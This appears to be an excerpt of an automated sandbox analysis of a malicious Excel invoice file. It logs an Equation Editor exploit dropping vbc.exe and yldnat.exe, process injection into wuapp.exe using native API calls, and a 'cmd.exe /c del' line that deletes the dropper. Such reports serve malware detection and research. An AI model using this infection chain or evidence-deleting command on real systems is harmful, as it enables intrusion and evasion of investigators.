Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041EF50 6_2_0041EF50
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041DF0D 6_2_0041DF0D
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041E79A 6_2_0041E79A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013BA184 6_2_013BA184
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B1890 6_2_013B1890
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013BC3BD 6_2_013BC3BD
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013BB3F1 6_2_013BB3F1
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B9C12 6_2_013B9C12
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B96A0 6_2_013B96A0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B7E88 6_2_013B7E88
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0086E0C6 6_2_0086E0C6
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0089D005 6_2_0089D005
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00873040 6_2_00873040
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0088905A 6_2_0088905A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0086E2E9 6_2_0086E2E9
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00911238 6_2_00911238
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_009163BF 6_2_009163BF
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0086F3CF 6_2_0086F3CF
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008963DB 6_2_008963DB
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00872305 6_2_00872305
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00877353 6_2_00877353
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008BA37B 6_2_008BA37B
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00881489 6_2_00881489
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008A5485 6_2_008A5485
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008F443E 6_2_008F443E
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008AD47D 6_2_008AD47D
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0088C5F0 6_2_0088C5F0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0087351F 6_2_0087351F
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008B6540 6_2_008B6540
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00874680 6_2_00874680
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0087E6C1 6_2_0087E6C1
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00912622 6_2_00912622
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008BA634 6_2_008BA634
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008F579A 6_2_008F579A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0087C7BC 6_2_0087C7BC
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008A57C3 6_2_008A57C3
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EAE0C6 8_2_01EAE0C6
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F2D06D 8_2_01F2D06D
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB3040 8_2_01EB3040
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EC905A 8_2_01EC905A
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EDD005 8_2_01EDD005
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EAF3CF 8_2_01EAF3CF
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ED63DB 8_2_01ED63DB
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F563BF 8_2_01F563BF
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EFA37B 8_2_01EFA37B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB7353 8_2_01EB7353
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB2305 8_2_01EB2305
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EAE2E9 8_2_01EAE2E9
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F51238 8_2_01F51238
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F305E3 8_2_01F305E3
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ECC5F0 8_2_01ECC5F0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EF6540 8_2_01EF6540
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB351F 8_2_01EB351F
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EC1489 8_2_01EC1489
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EE5485 8_2_01EE5485
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EED47D 8_2_01EED47D
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F3443E 8_2_01F3443E
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EE57C3 8_2_01EE57C3
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EBC7BC 8_2_01EBC7BC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F3579A 8_2_01F3579A
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EBE6C1 8_2_01EBE6C1
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB4680 8_2_01EB4680
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F52622 8_2_01F52622
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EFA634 8_2_01EFA634
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EC69FE 8_2_01EC69FE
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EB29B2 8_2_01EB29B2
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5098E 8_2_01F5098E
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F35955 8_2_01F35955
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F3394B 8_2_01F3394B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F4F8EE 8_2_01F4F8EE
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F2F8C4 8_2_01F2F8C4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ED286D 8_2_01ED286D
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EBC85C 8_2_01EBC85C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F3DBDA 8_2_01F3DBDA
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F5CBA4 8_2_01F5CBA4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ED7B00 8_2_01ED7B00
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F63A83 8_2_01F63A83
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F4FDDD 8_2_01F4FDDD
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EBCD5B 8_2_01EBCD5B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EE0D3B 8_2_01EE0D3B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F22FDC 8_2_01F22FDC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01F4CFB1 8_2_01F4CFB1
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EDDF7C 8_2_01EDDF7C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EC0F3F 8_2_01EC0F3F
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01ECEE4C 8_2_01ECEE4C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EE2E2F 8_2_01EE2E2F
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E1BE 8_2_0012E1BE
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E1EB 8_2_0012E1EB
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_00119220 8_2_00119220
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E79A 8_2_0012E79A
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012E9FF 8_2_0012E9FF
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0011DBC0 8_2_0011DBC0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_00112D90 8_2_00112D90
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_00112D89 8_2_00112D89
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012DEF7 8_2_0012DEF7
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_00112FB0 8_2_00112FB0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 008DF970 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 008B373B appears 112 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 008B3F92 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 013B4599 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 0086DF5C appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: String function: 013B2400 appears 54 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01EADF5C appears 121 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01F1F970 appears 84 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01EF373B appears 245 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01EF3F92 appears 132 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 01EAE2A8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A2D0 NtCreateFile, 6_2_0041A2D0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A380 NtReadFile, 6_2_0041A380
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A400 NtClose, 6_2_0041A400
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A4B0 NtAllocateVirtualMemory, 6_2_0041A4B0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A2CA NtCreateFile, 6_2_0041A2CA
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A28A NtCreateFile, 6_2_0041A28A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041A4AA NtAllocateVirtualMemory, 6_2_0041A4AA
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008600C4 NtCreateFile,LdrInitializeThunk, 6_2_008600C4
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00860048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_00860048
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00860078 NtResumeThread,LdrInitializeThunk, 6_2_00860078
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008607AC NtCreateMutant,LdrInitializeThunk, 6_2_008607AC
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085F9F0 NtClose,LdrInitializeThunk, 6_2_0085F9F0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085F900 NtReadFile,LdrInitializeThunk, 6_2_0085F900
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_0085FAD0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_0085FAE8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_0085FBB8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_0085FB68
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_0085FC90
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0085FC60
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FD8C NtDelayExecution,LdrInitializeThunk, 6_2_0085FD8C
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_0085FDC0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_0085FEA0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_0085FED0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0085FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0085FFB4
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008610D0 NtOpenProcessToken, 6_2_008610D0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00860060 NtQuerySection, 6_2_00860060
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008601D4 NtSetValueKey, 6_2_008601D4
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0086010C NtOpenDirectoryObject, 6_2_0086010C
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00861148 NtOpenThread, 6_2_00861148
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA00C4 NtCreateFile,LdrInitializeThunk, 8_2_01EA00C4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA07AC NtCreateMutant,LdrInitializeThunk, 8_2_01EA07AC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9F9F0 NtClose,LdrInitializeThunk, 8_2_01E9F9F0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9F900 NtReadFile,LdrInitializeThunk, 8_2_01E9F900
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_01E9FBB8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_01E9FB68
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FB50 NtCreateKey,LdrInitializeThunk, 8_2_01E9FB50
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_01E9FAE8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_01E9FAD0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FAB8 NtQueryValueKey,LdrInitializeThunk, 8_2_01E9FAB8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01E9FDC0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FD8C NtDelayExecution,LdrInitializeThunk, 8_2_01E9FD8C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_01E9FC60
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FFB4 NtCreateSection,LdrInitializeThunk, 8_2_01E9FFB4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_01E9FED0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA01D4 NtSetValueKey, 8_2_01EA01D4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA1148 NtOpenThread, 8_2_01EA1148
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA010C NtOpenDirectoryObject, 8_2_01EA010C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA10D0 NtOpenProcessToken, 8_2_01EA10D0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA0060 NtQuerySection, 8_2_01EA0060
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA0078 NtResumeThread, 8_2_01EA0078
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA0048 NtProtectVirtualMemory, 8_2_01EA0048
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9F938 NtWriteFile, 8_2_01E9F938
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA1930 NtSetContextThread, 8_2_01EA1930
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9F8CC NtWaitForSingleObject, 8_2_01E9F8CC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FBE8 NtQueryVirtualMemory, 8_2_01E9FBE8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FA50 NtEnumerateValueKey, 8_2_01E9FA50
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FA20 NtQueryInformationFile, 8_2_01E9FA20
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA1D80 NtSuspendThread, 8_2_01EA1D80
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FD5C NtEnumerateKey, 8_2_01E9FD5C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FC90 NtUnmapViewOfSection, 8_2_01E9FC90
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FC48 NtSetInformationFile, 8_2_01E9FC48
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01EA0C40 NtGetContextThread, 8_2_01EA0C40
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FC30 NtOpenProcess, 8_2_01E9FC30
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FFFC NtCreateProcessEx, 8_2_01E9FFFC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FF34 NtQueueApcThread, 8_2_01E9FF34
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FEA0 NtReadVirtualMemory, 8_2_01E9FEA0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_01E9FE24 NtWriteVirtualMemory, 8_2_01E9FE24
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A2D0 NtCreateFile, 8_2_0012A2D0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A380 NtReadFile, 8_2_0012A380
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A400 NtClose, 8_2_0012A400
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A4B0 NtAllocateVirtualMemory, 8_2_0012A4B0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A28A NtCreateFile, 8_2_0012A28A
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A2CA NtCreateFile, 8_2_0012A2CA
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 8_2_0012A4AA NtAllocateVirtualMemory, 8_2_0012A4AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\wuapp.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\wuapp.exe Memory allocated: 77740000 page execute and read and write
Source: DL03327INV.xlsx Virustotal: Detection: 38%
Source: DL03327INV.xlsx ReversingLabs: Detection: 26%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
Source: C:\Windows\SysWOW64\wuapp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$DL03327INV.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6B01.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@11/16@5/5
Source: C:\Users\Public\vbc.exe Code function: 4_2_004021AA CoCreateInstance, 4_2_004021AA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 4_2_00404ABB
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
Source: Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B2445 push ecx; ret 5_2_013B2458
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041E9FF push dword ptr [2E33947Ah]; ret 6_2_0041E9FB
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041D5D5 push eax; ret 6_2_0041D628
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041D622 push eax; ret 6_2_0041D628
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041D62B push eax; ret 6_2_0041D692
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041D68C push eax; ret 6_2_0041D692
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041E79A push dword ptr [2E33947Ah]; ret 6_2_0041E9FB
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B2445 push ecx; ret 6_2_013B2458
